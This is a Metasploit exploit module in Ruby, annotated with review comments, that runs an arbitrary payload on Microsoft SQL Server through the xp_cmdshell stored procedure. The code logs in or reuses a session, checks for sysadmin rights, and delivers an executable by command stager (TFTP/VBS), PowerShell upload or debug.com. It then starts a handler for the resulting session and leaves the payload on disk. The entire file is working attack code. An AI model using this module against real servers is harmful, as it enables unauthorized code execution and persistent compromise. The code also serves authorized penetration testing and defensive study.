Path: blob/master/modules/exploits/windows/mssql/mssql_payload.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Payload execution against Microsoft SQL Server via the xp_cmdshell stored
# procedure. Three delivery methods are selectable through the METHOD option
# (see #exploit). The check() routine only verifies credentials and sysadmin
# membership; it does not stage or run a payload.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::MSSQL
  include Msf::Exploit::CmdStager
  # Allows an already-established MSSQL session to be reused instead of
  # re-authenticating with USERNAME/PASSWORD (see the `if session` branches).
  include Msf::OptionalSession::MSSQL
  # include Msf::Exploit::CmdStagerDebugAsm
  # include Msf::Exploit::CmdStagerDebugWrite
  # include Msf::Exploit::CmdStagerTFTP

  # Module metadata plus the METHOD option.
  #
  # METHOD is matched by prefix in #exploit: values starting with "cmd" use
  # the command stager, values starting with "ps" or "power" use the
  # PowerShell path, and *any other value* (not only "old") falls through to
  # the debug.com path.
  #
  # NOTE(review): 'wcsript.exe' in the description below reads like a typo for
  # 'wscript.exe' — confirm before changing, as it is user-visible text.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft SQL Server Payload Execution',
        'Description' => %q{
          This module executes an arbitrary payload on a Microsoft SQL Server by using
          the "xp_cmdshell" stored procedure. Currently, three delivery methods are supported.

          First, the original method uses Windows 'debug.com'. File size restrictions are
          avoided by incorporating the debug bypass method presented by SecureStat at
          Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems.

          A second method takes advantage of the Command Stager subsystem. This allows using
          various techniques, such as using a TFTP server, to send the executable. By default
          the Command Stager uses 'wcsript.exe' to generate the executable on the target.

          Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the
          payload on the target.

          NOTE: This module will leave a payload executable on the target system when the
          attack is finished.
        },
        'Author' => [
          'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>', # original module, debug.exe method, powershell method
          'jduck' # command stager mods
        ],
        'License' => MSF_LICENSE,
        'References' => [
          # 'sa' password in logs
          [ 'CVE', '2000-0402' ],
          [ 'OSVDB', '557' ],
          [ 'BID', '1281' ],

          # blank default 'sa' password
          [ 'CVE', '2000-1209' ],
          [ 'OSVDB', '15757' ],
          [ 'BID', '4797' ]
        ],
        'Platform' => 'win',
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'Targets' => [
          [ 'Automatic', {} ],
        ],
        'CmdStagerFlavor' => 'vbs',
        'DefaultTarget' => 0,
        'DisclosureDate' => '2000-05-30',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
    register_options(
      [
        OptString.new('METHOD', [ true, 'Which payload delivery method to use (ps, cmd, or old)', 'cmd' ])
      ]
    )
  end

  # Determines whether the configured account can be used.
  #
  # Returns:
  #   CheckCode::Detected   - no session and the datastore credentials did not log in
  #   CheckCode::Vulnerable - login succeeded and the account is a sysadmin
  #   CheckCode::Safe       - login succeeded but the account is not a sysadmin
  #
  # Only a version query and the sysadmin membership test are issued here;
  # nothing is written to or executed on the target. From a defender's side,
  # the precondition this tests for is an SQL login holding sysadmin — denying
  # that role to network-reachable accounts removes it.
  def check
    if session
      set_mssql_session(session.client)
    end

    unless session || mssql_login_datastore
      vprint_status("Invalid SQL Server credentials")
      return Exploit::CheckCode::Detected
    end

    # Second argument is passed straight through to mssql_query; its meaning
    # (presumably "verbose"/"don't parse") is defined by the mixin — confirm.
    mssql_query("select @@version", true)
    if mssql_is_sysadmin
      vprint_good "User #{datastore['USERNAME']} is a sysadmin"
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  ensure
    # Runs on every exit path, including the early return above and the case
    # where a pre-existing session was supplied. Whether that closes the
    # supplied session's transport depends on the mixin — confirm.
    disconnect
  end

  # Callback required by Msf::Exploit::CmdStager: each staged command line is
  # executed on the target through xp_cmdshell.
  #
  # @param cmd  [String] command line produced by the stager
  # @param opts [Hash]   stager options; unused here
  def execute_command(cmd, opts)
    mssql_xpcmdshell(cmd, datastore['VERBOSE'])
  end

  # Main entry point. Authenticates (or reuses the supplied session), picks a
  # delivery method from METHOD, delivers and runs the payload, then starts
  # the handler and disconnects.
  def exploit
    if session
      set_mssql_session(session.client)
    else
      unless mssql_login_datastore
        print_status("Invalid SQL Server credentials")
        return
      end
    end

    method = datastore['METHOD'].downcase

    if (method =~ /^cmd/)
      # A wildcard SRVHOST cannot be handed to the target as a callback
      # address, so substitute the local source address for it.
      tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
      # nodelete: true presumably corresponds to the description's NOTE that
      # the payload executable is left on disk — confirm against the mixin.
      execute_cmdstager({ linemax: 1500, tftphost: tftphost, nodelete: true })
    else
      # Generate the EXE, this is the same no matter what delivery mechanism we use
      exe = generate_payload_exe

      # Use powershell method for payload delivery if specified
      if (method =~ /^ps/) or (method =~ /^power/)
        powershell_upload_exec(exe)
      else
        # Otherwise, fall back to the old way.. (debug.com). Any METHOD value
        # that is not cmd*/ps*/power* lands here, not just 'old'.
        mssql_upload_exec(exe, datastore['VERBOSE'])
      end
    end

    handler
    disconnect
  end
end